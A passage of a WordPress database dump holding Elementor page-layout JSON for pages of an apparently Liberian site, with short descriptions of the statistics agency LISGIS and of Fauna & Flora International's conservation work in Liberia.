":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"66be95e\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"49e2ba5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9fe992\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df7fe5f\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" term=\\\"document_tag:epa\\\" columns=\\\"title,excerpt,cf:download_link,tax:document_category\\\" widths=\\\"350px,900px,auto,auto\\\" links=\\\"terms\\\" filters=\\\"false\\\" rows_per_page=\\\"5\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(9474,1652,'_elementor_controls_usage','a:0:{}'),(9475,1652,'_elementor_edit_mode','builder'),(9476,1652,'_elementor_template_type','wp-post'),(9477,1652,'_elementor_version','2.7.5'),(9478,1652,'_wp_page_template','default'),(9479,1652,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8e15880\",\"elType\":\"widget\",\"settings\":{\"title\":\"LISGIS Resources\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b9ecfb\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dfcc11d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"88a92e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb88ab3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"709cf34\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"dd929c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f4f627c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9480,1653,'_elementor_controls_usage','a:0:{}'),(9481,1653,'_elementor_edit_mode','builder'),(9482,1653,'_elementor_template_type','wp-post'),(9483,1653,'_elementor_version','2.7.5'),(9484,1653,'_wp_page_template','default'),(9485,1653,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cc356dd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LISGIS Serves as the prime, authoritative agency of Government responsible for collecting, managing, coordinating, supervising, evaluating, analyzing, disseminating and setting quality standards for statistical and associated geo-information for overall national socio-economic reconstruction and development; and<\\/p><p>More specifically, LISGIS formulates and implements national strategies, programs and policies for the development and management of a National Statistical and Geo-Information System and an integrated gender and environment sensitive National Statistical and Spatial Database in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7fea51\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"610c742\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6b9ecfb\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dfcc11d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"88a92e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cb88ab3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"709cf34\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b27ce91\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"dd929c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f4f627c\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false}]'),(9494,1655,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:6;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}}'),(9495,1655,'_elementor_edit_mode','builder'),(9496,1655,'_elementor_template_type','wp-post'),(9497,1655,'_elementor_version','2.7.5'),(9498,1655,'_wp_page_template','default'),(9499,1655,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"37ef818\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"1c00780\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"10a4e07\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e03e301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"da4845a\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"b08a954\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9caf5f9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 